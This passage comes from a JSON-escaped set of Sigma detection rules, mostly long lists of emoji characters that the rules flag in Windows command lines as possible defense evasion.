- '💋'\n            - '🩸'\n            - '👶'\n            - '👧'\n            - '🧒'\n            - '👦'\n            - '👩'\n            - '🧑'\n            - '👨'\n            - '👩‍🦱'\n            - '🧑‍🦱'\n            - '👨‍🦱'\n            - '👩‍🦰'\n            - '🧑‍🦰'\n            - '👨‍🦰'\n            - '👱‍♀️'\n            - '👱'\n            - '👱‍♂️'\n            - '👩‍🦳'\n            - '🧑‍🦳'\n            - '👨‍🦳'\n            - '👩‍🦲'\n            - '🧑‍🦲'\n            - '👨‍🦲'\n            - '🧔‍♀️'\n            - '🧔'\n            - '🧔‍♂️'\n            - '👵'\n            - '🧓'\n            - '👴'\n            - '👲'\n            - '👳‍♀️'\n            - '👳'\n            - '👳‍♂️'\n            - '🧕'\n            - '👮‍♀️'\n            - '👮'\n            - '👮‍♂️'\n            - '👷‍♀️'\n            - '👷'\n            - '👷‍♂️'\n            - '💂‍♀️'\n            - '💂'\n            - '💂‍♂️'\n            - '🕵️‍♀️'\n            - '🕵️'\n            - '🕵️‍♂️'\n            - '👩‍⚕️'\n            - '🧑‍⚕️'\n            - '👨‍⚕️'\n            - '👩‍🌾'\n            - '🧑‍🌾'\n            - '👨‍🌾'\n            - '👩‍🍳'\n            - '🧑‍🍳'\n            - '👨‍🍳'\n            - '👩‍🎓'\n            - '🧑‍🎓'\n            - '👨‍🎓'\n            - '👩‍🎤'\n            - '🧑‍🎤'\n            - '👨‍🎤'\n            - '👩‍🏫'\n            - '🧑‍🏫'\n            - '👨‍🏫'\n            - '👩‍🏭'\n            - '🧑‍🏭'\n            - '👨‍🏭'\n            - '👩‍💻'\n            - '🧑‍💻'\n            - '👨‍💻'\n            - '👩‍💼'\n            - '🧑‍💼'\n            - '👨‍💼'\n            - '👩‍🔧'\n            - '🧑‍🔧'\n            - '👨‍🔧'\n            - '👩‍🔬'\n            - '🧑‍🔬'\n            - '👨‍🔬'\n            - '👩‍🎨'\n            - '🧑‍🎨'\n            - '👨‍🎨'\n            - '👩‍🚒'\n            - '🧑‍🚒'\n            - '👨‍🚒'\n            - '👩‍✈️'\n            - '🧑‍✈️'\n            - '👨‍✈️'\n            - '👩‍🚀'\n            - '🧑‍🚀'\n            - '👨‍🚀'\n            - '👩‍⚖️'\n            - '🧑‍⚖️'\n            - '👨‍⚖️'\n            - '👰‍♀️'\n           
 - '👰'\n            - '👰‍♂️'\n            - '🤵‍♀️'\n            - '🤵'\n            - '🤵‍♂️'\n            - '👸'\n            - '🫅'\n            - '🤴'\n            - '🥷'\n            - '🦸‍♀️'\n            - '🦸'\n            - '🦸‍♂️'\n            - '🦹‍♀️'\n            - '🦹'\n            - '🦹‍♂️'\n            - '🤶'\n            - '🧑‍🎄'\n            - '🎅'\n            - '🧙‍♀️'\n            - '🧙'\n            - '🧙‍♂️'\n            - '🧝‍♀️'\n            - '🧝'\n            - '🧝‍♂️'\n            - '🧛‍♀️'\n            - '🧛'\n            - '🧛‍♂️'\n            - '🧟‍♀️'\n            - '🧟'\n            - '🧟‍♂️'\n            - '🧞‍♀️'\n            - '🧞'\n            - '🧞‍♂️'\n            - '🧜‍♀️'\n            - '🧜'\n            - '🧜‍♂️'\n            - '🧚‍♀️'\n            - '🧚'\n            - '🧚‍♂️'\n            - '🧌'\n            - '👼'\n            - '🤰'\n            - '🫄'\n            - '🫃'\n            - '🤱'\n            - '👩‍🍼'\n            - '🧑‍🍼'\n            - '👨‍🍼'\n            - '🙇‍♀️'\n            - '🙇'\n            - '🙇‍♂️'\n            - '💁‍♀️'\n            - '💁'\n            - '💁‍♂️'\n            - '🙅‍♀️'\n            - '🙅'\n            - '🙅‍♂️'\n            - '🙆‍♀️'\n            - '🙆'\n            - '🙆‍♂️'\n            - '🙋‍♀️'\n            - '🙋'\n            - '🙋‍♂️'\n            - '🧏‍♀️'\n            - '🧏'\n            - '🧏‍♂️'\n            - '🤦‍♀️'\n            - '🤦'\n            - '🤦‍♂️'\n            - '🤷‍♀️'\n            - '🤷'\n            - '🤷‍♂️'\n            - '🙎‍♀️'\n            - '🙎'\n            - '🙎‍♂️'\n            - '🙍‍♀️'\n            - '🙍'\n            - '🙍‍♂️'\n            - '💇‍♀️'\n            - '💇'\n            - '💇‍♂️'\n            - '💆‍♀️'\n            - '💆'\n            - '💆‍♂️'\n            - '🧖‍♀️'\n            - '🧖'\n            - '🧖‍♂️'\n            - '💅'\n            - '💃'\n            - '🕺'\n            - '👯‍♀️'\n            - '👯'\n            - '👯‍♂️'\n            - '🕴'\n            - '👩‍🦽'\n            - '🧑‍🦽'\n            - '👨‍🦽'\n       
     - '👩‍🦼'\n            - '🧑‍🦼'\n            - '👨‍🦼'\n            - '🚶‍♀️'\n            - '🚶'\n            - '🚶‍♂️'\n            - '👩‍🦯'\n            - '🧑‍🦯'\n            - '👨‍🦯'\n            - '🧎‍♀️'\n            - '🧎'\n            - '🧎‍♂️'\n            - '🏃‍♀️'\n            - '🏃'\n            - '🏃‍♂️'\n            - '🧍‍♀️'\n            - '🧍'\n            - '🧍‍♂️'\n            - '👭'\n            - '🧑‍🤝‍🧑'\n            - '👬'\n            - '👫'\n            - '👩‍❤️‍👩'\n            - '💑'\n            - '👨‍❤️‍👨'\n            - '👩‍❤️‍👨'\n            - '👩‍❤️‍💋‍👩'\n            - '💏'\n            - '👨‍❤️‍💋‍👨'\n            - '👩‍❤️‍💋‍👨'\n            - '👪'\n            - '👨‍👩‍👦'\n            - '👨‍👩‍👧'\n            - '👨‍👩‍👧‍👦'\n            - '👨‍👩‍👦‍👦'\n            - '👨‍👩‍👧‍👧'\n            - '👨‍👨‍👦'\n            - '👨‍👨‍👧'\n            - '👨‍👨‍👧‍👦'\n            - '👨‍👨‍👦‍👦'\n            - '👨‍👨‍👧‍👧'\n            - '👩‍👩‍👦'\n            - '👩‍👩‍👧'\n            - '👩‍👩‍👧‍👦'\n            - '👩‍👩‍👦‍👦'\n            - '👩‍👩‍👧‍👧'\n            - '👨‍👦'\n            - '👨‍👦‍👦'\n            - '👨‍👧'\n            - '👨‍👧‍👦'\n            - '👨‍👧‍👧'\n            - '👩‍👦'\n            - '👩‍👦‍👦'\n            - '👩‍👧'\n            - '👩‍👧‍👦'\n            - '👩‍👧‍👧'\n            - '🗣'\n            - '👤'\n            - '👥'\n            - '🫂'\n            - '🧳'\n            - '🌂'\n            - '☂️'\n            - '🧵'\n            - '🪡'\n            - '🪢'\n            - '🧶'\n            - '👓'\n            - '🕶'\n            - '🥽'\n            - '🥼'\n            - '🦺'\n            - '👔'\n            - '👕'\n            - '👖'\n            - '🧣'\n            - '🧤'\n            - '🧥'\n            - '🧦'\n            - '👗'\n            - '👘'\n            - '🥻'\n            - '🩴'\n            - '🩱'\n            - '🩲'\n            - '🩳'\n            - '👙'\n            - '👚'\n            - '👛'\n            - '👜'\n            - '👝'\n            - '🎒'\n            - '👞'\n            - '👟'\n            - '🥾'\n            - 
'🥿'\n            - '👠'\n            - '👡'\n            - '🩰'\n            - '👢'\n            - '👑'\n            - '👒'\n            - '🎩'\n            - '🎓'\n            - '🧢'\n            - '⛑'\n            - '🪖'\n            - '💄'\n            - '💍'\n            - '💼'\n            - '👋🏻'\n            - '🤚🏻'\n            - '🖐🏻'\n            - '✋🏻'\n            - '🖖🏻'\n            - '👌🏻'\n            - '🤌🏻'\n            - '🤏🏻'\n            - '✌🏻'\n            - '🤞🏻'\n            - '🫰🏻'\n            - '🤟🏻'\n            - '🤘🏻'\n            - '🤙🏻'\n            - '🫵🏻'\n            - '🫱🏻'\n            - '🫲🏻'\n            - '🫳🏻'\n            - '🫴🏻'\n            - '👈🏻'\n            - '👉🏻'\n            - '👆🏻'\n            - '🖕🏻'\n            - '👇🏻'\n            - '☝🏻'\n            - '👍🏻'\n            - '👎🏻'\n            - '✊🏻'\n            - '👊🏻'\n            - '🤛🏻'\n            - '🤜🏻'\n            - '👏🏻'\n            - '🫶🏻'\n            - '🙌🏻'\n            - '👐🏻'\n            - '🤲🏻'\n            - '🙏🏻'\n            - '✍🏻'\n            - '💪🏻'\n            - '🦵🏻'\n            - '🦶🏻'\n            - '👂🏻'\n            - '🦻🏻'\n            - '👃🏻'\n            - '👶🏻'\n            - '👧🏻'\n            - '🧒🏻'\n            - '👦🏻'\n            - '👩🏻'\n            - '🧑🏻'\n            - '👨🏻'\n            - '👩🏻‍🦱'\n            - '🧑🏻‍🦱'\n            - '👨🏻‍🦱'\n            - '👩🏻‍🦰'\n            - '🧑🏻‍🦰'\n            - '👨🏻‍🦰'\n            - '👱🏻‍♀️'\n            - '👱🏻'\n            - '👱🏻‍♂️'\n            - '👩🏻‍🦳'\n            - '🧑🏻‍🦳'\n            - '👨🏻‍🦳'\n            - '👩🏻‍🦲'\n            - '🧑🏻‍🦲'\n            - '👨🏻‍🦲'\n            - '🧔🏻‍♀️'\n            - '🧔🏻'\n            - '🧔🏻‍♂️'\n            - '👵🏻'\n            - '🧓🏻'\n            - '👴🏻'\n            - '👲🏻'\n            - '👳🏻‍♀️'\n            - '👳🏻'\n            - '👳🏻‍♂️'\n            - '🧕🏻'\n            - '👮🏻‍♀️'\n            - '👮🏻'\n            - '👮🏻‍♂️'\n            - '👷🏻‍♀️'\n            - '👷🏻'\n            - '👷🏻‍♂️'\n            - 
'💂🏻‍♀️'\n            - '💂🏻'\n            - '💂🏻‍♂️'\n            - '🕵🏻‍♀️'\n            - '🕵🏻'\n            - '🕵🏻‍♂️'\n            - '👩🏻‍⚕️'\n            - '🧑🏻‍⚕️'\n            - '👨🏻‍⚕️'\n            - '👩🏻‍🌾'\n            - '🧑🏻‍🌾'\n            - '👨🏻‍🌾'\n            - '👩🏻‍🍳'\n            - '🧑🏻‍🍳'\n            - '👨🏻‍🍳'\n            - '👩🏻‍🎓'\n            - '🧑🏻‍🎓'\n            - '👨🏻‍🎓'\n            - '👩🏻‍🎤'\n            - '🧑🏻‍🎤'\n            - '👨🏻‍🎤'\n            - '👩🏻‍🏫'\n            - '🧑🏻‍🏫'\n            - '👨🏻‍🏫'\n            - '👩🏻‍🏭'\n            - '🧑🏻‍🏭'\n            - '👨🏻‍🏭'\n            - '👩🏻‍💻'\n            - '🧑🏻‍💻'\n            - '👨🏻‍💻'\n            - '👩🏻‍💼'\n            - '🧑🏻‍💼'\n            - '👨🏻‍💼'\n            - '👩🏻‍🔧'\n            - '🧑🏻‍🔧'\n            - '👨🏻‍🔧'\n            - '👩🏻‍🔬'\n            - '🧑🏻‍🔬'\n            - '👨🏻‍🔬'\n            - '👩🏻‍🎨'\n            - '🧑🏻‍🎨'\n            - '👨🏻‍🎨'\n            - '👩🏻‍🚒'\n            - '🧑🏻‍🚒'\n            - '👨🏻‍🚒'\n            - '👩🏻‍✈️'\n            - '🧑🏻‍✈️'\n            - '👨🏻‍✈️'\n            - '👩🏻‍🚀'\n            - '🧑🏻‍🚀'\n            - '👨🏻‍🚀'\n            - '👩🏻‍⚖️'\n            - '🧑🏻‍⚖️'\n            - '👨🏻‍⚖️'\n            - '👰🏻‍♀️'\n            - '👰🏻'\n            - '👰🏻‍♂️'\n            - '🤵🏻‍♀️'\n            - '🤵🏻'\n            - '🤵🏻‍♂️'\n            - '👸🏻'\n            - '🫅🏻'\n            - '🤴🏻'\n            - '🥷🏻'\n            - '🦸🏻‍♀️'\n            - '🦸🏻'\n            - '🦸🏻‍♂️'\n            - '🦹🏻‍♀️'\n            - '🦹🏻'\n            - '🦹🏻‍♂️'\n            - '🤶🏻'\n            - '🧑🏻‍🎄'\n            - '🎅🏻'\n            - '🧙🏻‍♀️'\n            - '🧙🏻'\n            - '🧙🏻‍♂️'\n            - '🧝🏻‍♀️'\n            - '🧝🏻'\n            - '🧝🏻‍♂️'\n            - '🧛🏻‍♀️'\n            - '🧛🏻'\n            - '🧛🏻‍♂️'\n            - '🧜🏻‍♀️'\n            - '🧜🏻'\n            - '🧜🏻‍♂️'\n            - '🧚🏻‍♀️'\n            - '🧚🏻'\n            - '🧚🏻‍♂️'\n            - '👼🏻'\n            - '🤰🏻'\n            - '🫄🏻'\n            - '🫃🏻'\n 
           - '🤱🏻'\n            - '👩🏻‍🍼'\n            - '🧑🏻‍🍼'\n            - '👨🏻‍🍼'\n            - '🙇🏻‍♀️'\n            - '🙇🏻'\n            - '🙇🏻‍♂️'\n            - '💁🏻‍♀️'\n            - '💁🏻'\n            - '💁🏻‍♂️'\n            - '🙅🏻‍♀️'\n            - '🙅🏻'\n            - '🙅🏻‍♂️'\n            - '🙆🏻‍♀️'\n            - '🙆🏻'\n            - '🙆🏻‍♂️'\n            - '🙋🏻‍♀️'\n            - '🙋🏻'\n            - '🙋🏻‍♂️'\n            - '🧏🏻‍♀️'\n            - '🧏🏻'\n            - '🧏🏻‍♂️'\n            - '🤦🏻‍♀️'\n            - '🤦🏻'\n            - '🤦🏻‍♂️'\n            - '🤷🏻‍♀️'\n            - '🤷🏻'\n            - '🤷🏻‍♂️'\n            - '🙎🏻‍♀️'\n            - '🙎🏻'\n            - '🙎🏻‍♂️'\n            - '🙍🏻‍♀️'\n            - '🙍🏻'\n            - '🙍🏻‍♂️'\n            - '💇🏻‍♀️'\n            - '💇🏻'\n            - '💇🏻‍♂️'\n            - '💆🏻‍♀️'\n            - '💆🏻'\n            - '💆🏻‍♂️'\n            - '🧖🏻‍♀️'\n            - '🧖🏻'\n            - '🧖🏻‍♂️'\n            - '💃🏻'\n            - '🕺🏻'\n            - '🕴🏻'\n            - '👩🏻‍🦽'\n            - '🧑🏻‍🦽'\n            - '👨🏻‍🦽'\n            - '👩🏻‍🦼'\n            - '🧑🏻‍🦼'\n            - '👨🏻‍🦼'\n            - '🚶🏻‍♀️'\n            - '🚶🏻'\n            - '🚶🏻‍♂️'\n            - '👩🏻‍🦯'\n            - '🧑🏻‍🦯'\n            - '👨🏻‍🦯'\n            - '🧎🏻‍♀️'\n            - '🧎🏻'\n            - '🧎🏻‍♂️'\n            - '🏃🏻‍♀️'\n            - '🏃🏻'\n            - '🏃🏻‍♂️'\n            - '🧍🏻‍♀️'\n            - '🧍🏻'\n            - '🧍🏻‍♂️'\n            - '👭🏻'\n            - '🧑🏻‍🤝‍🧑🏻'\n            - '👬🏻'\n            - '👫🏻'\n            - '🧗🏻‍♀️'\n            - '🧗🏻'\n            - '🧗🏻‍♂️'\n            - '🏇🏻'\n            - '🏂🏻'\n            - '🏌🏻‍♀️'\n            - '🏌🏻'\n            - '🏌🏻‍♂️'\n            - '🏄🏻‍♀️'\n            - '🏄🏻'\n            - '🏄🏻‍♂️'\n            - '🚣🏻‍♀️'\n            - '🚣🏻'\n            - '🚣🏻‍♂️'\n            - '🏊🏻‍♀️'\n            - '🏊🏻'\n            - '🏊🏻‍♂️'\n            - '⛹🏻‍♀️'\n            - '⛹🏻'\n            - '⛹🏻‍♂️'\n            - 
'🏋🏻‍♀️'\n            - '🏋🏻'\n            - '🏋🏻‍♂️'\n            - '🚴🏻‍♀️'\n            - '🚴🏻'\n            - '🚴🏻‍♂️'\n            - '🚵🏻‍♀️'\n            - '🚵🏻'\n            - '🚵🏻‍♂️'\n            - '🤸🏻‍♀️'\n            - '🤸🏻'\n            - '🤸🏻‍♂️'\n            - '🤽🏻‍♀️'\n            - '🤽🏻'\n            - '🤽🏻‍♂️'\n            - '🤾🏻‍♀️'\n            - '🤾🏻'\n            - '🤾🏻‍♂️'\n            - '🤹🏻‍♀️'\n            - '🤹🏻'\n            - '🤹🏻‍♂️'\n            - '🧘🏻‍♀️'\n            - '🧘🏻'\n            - '🧘🏻‍♂️'\n            - '🛀🏻'\n            - '🛌🏻'\n            - '👋🏼'\n            - '🤚🏼'\n            - '🖐🏼'\n            - '✋🏼'\n            - '🖖🏼'\n            - '👌🏼'\n            - '🤌🏼'\n            - '🤏🏼'\n            - '✌🏼'\n            - '🤞🏼'\n            - '🫰🏼'\n            - '🤟🏼'\n            - '🤘🏼'\n            - '🤙🏼'\n            - '🫵🏼'\n            - '🫱🏼'\n            - '🫲🏼'\n            - '🫳🏼'\n            - '🫴🏼'\n            - '👈🏼'\n            - '👉🏼'\n            - '👆🏼'\n            - '🖕🏼'\n            - '👇🏼'\n            - '☝🏼'\n            - '👍🏼'\n            - '👎🏼'\n            - '✊🏼'\n            - '👊🏼'\n            - '🤛🏼'\n            - '🤜🏼'\n            - '👏🏼'\n            - '🫶🏼'\n            - '🙌🏼'\n            - '👐🏼'\n            - '🤲🏼'\n            - '🙏🏼'\n            - '✍🏼'\n            - '💪🏼'\n            - '🦵🏼'\n            - '🦶🏼'\n            - '👂🏼'\n            - '🦻🏼'\n            - '👃🏼'\n            - '👶🏼'\n            - '👧🏼'\n            - '🧒🏼'\n            - '👦🏼'\n            - '👩🏼'\n            - '🧑🏼'\n            - '👨🏼'\n            - '👩🏼‍🦱'\n            - '🧑🏼‍🦱'\n            - '👨🏼‍🦱'\n            - '👩🏼‍🦰'\n            - '🧑🏼‍🦰'\n            - '👨🏼‍🦰'\n            - '👱🏼‍♀️'\n            - '👱🏼'\n            - '👱🏼‍♂️'\n            - '👩🏼‍🦳'\n            - '🧑🏼‍🦳'\n            - '👨🏼‍🦳'\n            - '👩🏼‍🦲'\n            - '🧑🏼‍🦲'\n            - '👨🏼‍🦲'\n            - '🧔🏼‍♀️'\n            - '🧔🏼'\n            - '🧔🏼‍♂️'\n            - '👵🏼'\n          
  - '🧓🏼'\n            - '👴🏼'\n            - '👲🏼'\n            - '👳🏼‍♀️'\n            - '👳🏼'\n            - '👳🏼‍♂️'\n            - '🧕🏼'\n            - '👮🏼‍♀️'\n            - '👮🏼'\n            - '👮🏼‍♂️'\n            - '👷🏼‍♀️'\n            - '👷🏼'\n            - '👷🏼‍♂️'\n            - '💂🏼‍♀️'\n            - '💂🏼'\n            - '💂🏼‍♂️'\n            - '🕵🏼‍♀️'\n            - '🕵🏼'\n            - '🕵🏼‍♂️'\n            - '👩🏼‍⚕️'\n            - '🧑🏼‍⚕️'\n            - '👨🏼‍⚕️'\n            - '👩🏼‍🌾'\n            - '🧑🏼‍🌾'\n            - '👨🏼‍🌾'\n            - '👩🏼‍🍳'\n            - '🧑🏼‍🍳'\n            - '👨🏼‍🍳'\n            - '👩🏼‍🎓'\n            - '🧑🏼‍🎓'\n            - '👨🏼‍🎓'\n            - '👩🏼‍🎤'\n            - '🧑🏼‍🎤'\n            - '👨🏼‍🎤'\n            - '👩🏼‍🏫'\n            - '🧑🏼‍🏫'\n            - '👨🏼‍🏫'\n            - '👩🏼‍🏭'\n            - '🧑🏼‍🏭'\n            - '👨🏼‍🏭'\n            - '👩🏼‍💻'\n            - '🧑🏼‍💻'\n            - '👨🏼‍💻'\n            - '👩🏼‍💼'\n            - '🧑🏼‍💼'\n            - '👨🏼‍💼'\n            - '👩🏼‍🔧'\n            - '🧑🏼‍🔧'\n            - '👨🏼‍🔧'\n            - '👩🏼‍🔬'\n            - '🧑🏼‍🔬'\n            - '👨🏼‍🔬'\n            - '👩🏼‍🎨'\n            - '🧑🏼‍🎨'\n            - '👨🏼‍🎨'\n            - '👩🏼‍🚒'\n            - '🧑🏼‍🚒'\n            - '👨🏼‍🚒'\n            - '👩🏼‍✈️'\n            - '🧑🏼‍✈️'\n            - '👨🏼‍✈️'\n            - '👩🏼‍🚀'\n            - '🧑🏼‍🚀'\n            - '👨🏼‍🚀'\n            - '👩🏼‍⚖️'\n            - '🧑🏼‍⚖️'\n            - '👨🏼‍⚖️'\n            - '👰🏼‍♀️'\n            - '👰🏼'\n            - '👰🏼‍♂️'\n            - '🤵🏼‍♀️'\n            - '🤵🏼'\n            - '🤵🏼‍♂️'\n            - '👸🏼'\n            - '🫅🏼'\n            - '🤴🏼'\n            - '🥷🏼'\n            - '🦸🏼‍♀️'\n            - '🦸🏼'\n            - '🦸🏼‍♂️'\n            - '🦹🏼‍♀️'\n            - '🦹🏼'\n            - '🦹🏼‍♂️'\n            - '🤶🏼'\n            - '🧑🏼‍🎄'\n            - '🎅🏼'\n            - '🧙🏼‍♀️'\n            - '🧙🏼'\n            - '🧙🏼‍♂️'\n            - '🧝🏼‍♀️'\n            - '🧝🏼'\n            - 
'🧝🏼‍♂️'\n            - '🧛🏼‍♀️'\n            - '🧛🏼'\n            - '🧛🏼‍♂️'\n            - '🧜🏼‍♀️'\n            - '🧜🏼'\n            - '🧜🏼‍♂️'\n            - '🧚🏼‍♀️'\n            - '🧚🏼'\n            - '🧚🏼‍♂️'\n            - '👼🏼'\n            - '🤰🏼'\n            - '🫄🏼'\n            - '🫃🏼'\n            - '🤱🏼'\n            - '👩🏼‍🍼'\n            - '🧑🏼‍🍼'\n            - '👨🏼‍🍼'\n            - '🙇🏼‍♀️'\n            - '🙇🏼'\n            - '🙇🏼‍♂️'\n            - '💁🏼‍♀️'\n            - '💁🏼'\n            - '💁🏼‍♂️'\n            - '🙅🏼‍♀️'\n            - '🙅🏼'\n            - '🙅🏼‍♂️'\n            - '🙆🏼‍♀️'\n            - '🙆🏼'\n            - '🙆🏼‍♂️'\n            - '🙋🏼‍♀️'\n            - '🙋🏼'\n            - '🙋🏼‍♂️'\n            - '🧏🏼‍♀️'\n            - '🧏🏼'\n            - '🧏🏼‍♂️'\n            - '🤦🏼‍♀️'\n            - '🤦🏼'\n            - '🤦🏼‍♂️'\n            - '🤷🏼‍♀️'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2\nid: c98f2a0d-e1b8-4f76-90d3-359caf88d6b9\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🤷🏼'\n            - '🤷🏼‍♂️'\n            - '🙎🏼‍♀️'\n            - '🙎🏼'\n            - '🙎🏼‍♂️'\n            - '🙍🏼‍♀️'\n            - '🙍🏼'\n            - '🙍🏼‍♂️'\n            - '💇🏼‍♀️'\n            - '💇🏼'\n            - '💇🏼‍♂️'\n            - '💆🏼‍♀️'\n            - '💆🏼'\n            - '💆🏼‍♂️'\n            - '🧖🏼‍♀️'\n            - '🧖🏼'\n            - '🧖🏼‍♂️'\n            - '💃🏼'\n            - '🕺🏼'\n            - '🕴🏼'\n            - '👩🏼‍🦽'\n            - '🧑🏼‍🦽'\n            - '👨🏼‍🦽'\n            - '👩🏼‍🦼'\n            - '🧑🏼‍🦼'\n            - '👨🏼‍🦼'\n            - '🚶🏼‍♀️'\n            - '🚶🏼'\n            - '🚶🏼‍♂️'\n            - '👩🏼‍🦯'\n            - '🧑🏼‍🦯'\n            - '👨🏼‍🦯'\n            - '🧎🏼‍♀️'\n            - '🧎🏼'\n            - '🧎🏼‍♂️'\n            - '🏃🏼‍♀️'\n            - '🏃🏼'\n            - '🏃🏼‍♂️'\n            - '🧍🏼‍♀️'\n            - '🧍🏼'\n            - '🧍🏼‍♂️'\n            - '👭🏼'\n            - '🧑🏼‍🤝‍🧑🏼'\n            - '👬🏼'\n            - '👫🏼'\n            - '🧗🏼‍♀️'\n            - '🧗🏼'\n            - '🧗🏼‍♂️'\n            - '🏇🏼'\n            - '🏂🏼'\n            - '🏌🏼‍♀️'\n            - '🏌🏼'\n            - '🏌🏼‍♂️'\n            - '🏄🏼‍♀️'\n            - '🏄🏼'\n            - '🏄🏼‍♂️'\n            - '🚣🏼‍♀️'\n            - '🚣🏼'\n            - '🚣🏼‍♂️'\n            - '🏊🏼‍♀️'\n            - '🏊🏼'\n            - '🏊🏼‍♂️'\n            - '⛹🏼‍♀️'\n            - '⛹🏼'\n            - '⛹🏼‍♂️'\n            - '🏋🏼‍♀️'\n            - '🏋🏼'\n           
 - '🏋🏼‍♂️'\n            - '🚴🏼‍♀️'\n            - '🚴🏼'\n            - '🚴🏼‍♂️'\n            - '🚵🏼‍♀️'\n            - '🚵🏼'\n            - '🚵🏼‍♂️'\n            - '🤸🏼‍♀️'\n            - '🤸🏼'\n            - '🤸🏼‍♂️'\n            - '🤽🏼‍♀️'\n            - '🤽🏼'\n            - '🤽🏼‍♂️'\n            - '🤾🏼‍♀️'\n            - '🤾🏼'\n            - '🤾🏼‍♂️'\n            - '🤹🏼‍♀️'\n            - '🤹🏼'\n            - '🤹🏼‍♂️'\n            - '🧘🏼‍♀️'\n            - '🧘🏼'\n            - '🧘🏼‍♂️'\n            - '🛀🏼'\n            - '🛌🏼'\n            - '👋🏽'\n            - '🤚🏽'\n            - '🖐🏽'\n            - '✋🏽'\n            - '🖖🏽'\n            - '👌🏽'\n            - '🤌🏽'\n            - '🤏🏽'\n            - '✌🏽'\n            - '🤞🏽'\n            - '🫰🏽'\n            - '🤟🏽'\n            - '🤘🏽'\n            - '🤙🏽'\n            - '🫵🏽'\n            - '🫱🏽'\n            - '🫲🏽'\n            - '🫳🏽'\n            - '🫴🏽'\n            - '👈🏽'\n            - '👉🏽'\n            - '👆🏽'\n            - '🖕🏽'\n            - '👇🏽'\n            - '☝🏽'\n            - '👍🏽'\n            - '👎🏽'\n            - '✊🏽'\n            - '👊🏽'\n            - '🤛🏽'\n            - '🤜🏽'\n            - '👏🏽'\n            - '🫶🏽'\n            - '🙌🏽'\n            - '👐🏽'\n            - '🤲🏽'\n            - '🙏🏽'\n            - '✍🏽'\n            - '💪🏽'\n            - '🦵🏽'\n            - '🦶🏽'\n            - '👂🏽'\n            - '🦻🏽'\n            - '👃🏽'\n            - '👶🏽'\n            - '👧🏽'\n            - '🧒🏽'\n            - '👦🏽'\n            - '👩🏽'\n            - '🧑🏽'\n            - '👨🏽'\n            - '👩🏽‍🦱'\n            - '🧑🏽‍🦱'\n            - '👨🏽‍🦱'\n            - '👩🏽‍🦰'\n            - '🧑🏽‍🦰'\n            - '👨🏽‍🦰'\n            - '👱🏽‍♀️'\n            - '👱🏽'\n            - '👱🏽‍♂️'\n            - '👩🏽‍🦳'\n            - '🧑🏽‍🦳'\n            - '👨🏽‍🦳'\n            - '👩🏽‍🦲'\n            - '🧑🏽‍🦲'\n            - '👨🏽‍🦲'\n            - '🧔🏽‍♀️'\n            - '🧔🏽'\n            - '🧔🏽‍♂️'\n            - '👵🏽'\n            - '🧓🏽'\n            - '👴🏽'\n          
  - '👲🏽'\n            - '👳🏽‍♀️'\n            - '👳🏽'\n            - '👳🏽‍♂️'\n            - '🧕🏽'\n            - '👮🏽‍♀️'\n            - '👮🏽'\n            - '👮🏽‍♂️'\n            - '👷🏽‍♀️'\n            - '👷🏽'\n            - '👷🏽‍♂️'\n            - '💂🏽‍♀️'\n            - '💂🏽'\n            - '💂🏽‍♂️'\n            - '🕵🏽‍♀️'\n            - '🕵🏽'\n            - '🕵🏽‍♂️'\n            - '👩🏽‍⚕️'\n            - '🧑🏽‍⚕️'\n            - '👨🏽‍⚕️'\n            - '👩🏽‍🌾'\n            - '🧑🏽‍🌾'\n            - '👨🏽‍🌾'\n            - '👩🏽‍🍳'\n            - '🧑🏽‍🍳'\n            - '👨🏽‍🍳'\n            - '👩🏽‍🎓'\n            - '🧑🏽‍🎓'\n            - '👨🏽‍🎓'\n            - '👩🏽‍🎤'\n            - '🧑🏽‍🎤'\n            - '👨🏽‍🎤'\n            - '👩🏽‍🏫'\n            - '🧑🏽‍🏫'\n            - '👨🏽‍🏫'\n            - '👩🏽‍🏭'\n            - '🧑🏽‍🏭'\n            - '👨🏽‍🏭'\n            - '👩🏽‍💻'\n            - '🧑🏽‍💻'\n            - '👨🏽‍💻'\n            - '👩🏽‍💼'\n            - '🧑🏽‍💼'\n            - '👨🏽‍💼'\n            - '👩🏽‍🔧'\n            - '🧑🏽‍🔧'\n            - '👨🏽‍🔧'\n            - '👩🏽‍🔬'\n            - '🧑🏽‍🔬'\n            - '👨🏽‍🔬'\n            - '👩🏽‍🎨'\n            - '🧑🏽‍🎨'\n            - '👨🏽‍🎨'\n            - '👩🏽‍🚒'\n            - '🧑🏽‍🚒'\n            - '👨🏽‍🚒'\n            - '👩🏽‍✈️'\n            - '🧑🏽‍✈️'\n            - '👨🏽‍✈️'\n            - '👩🏽‍🚀'\n            - '🧑🏽‍🚀'\n            - '👨🏽‍🚀'\n            - '👩🏽‍⚖️'\n            - '🧑🏽‍⚖️'\n            - '👨🏽‍⚖️'\n            - '👰🏽‍♀️'\n            - '👰🏽'\n            - '👰🏽‍♂️'\n            - '🤵🏽‍♀️'\n            - '🤵🏽'\n            - '🤵🏽‍♂️'\n            - '👸🏽'\n            - '🫅🏽'\n            - '🤴🏽'\n            - '🥷🏽'\n            - '🦸🏽‍♀️'\n            - '🦸🏽'\n            - '🦸🏽‍♂️'\n            - '🦹🏽‍♀️'\n            - '🦹🏽'\n            - '🦹🏽‍♂️'\n            - '🤶🏽'\n            - '🧑🏽‍🎄'\n            - '🎅🏽'\n            - '🧙🏽‍♀️'\n            - '🧙🏽'\n            - '🧙🏽‍♂️'\n            - '🧝🏽‍♀️'\n            - '🧝🏽'\n            - '🧝🏽‍♂️'\n            - '🧛🏽‍♀️'\n            - 
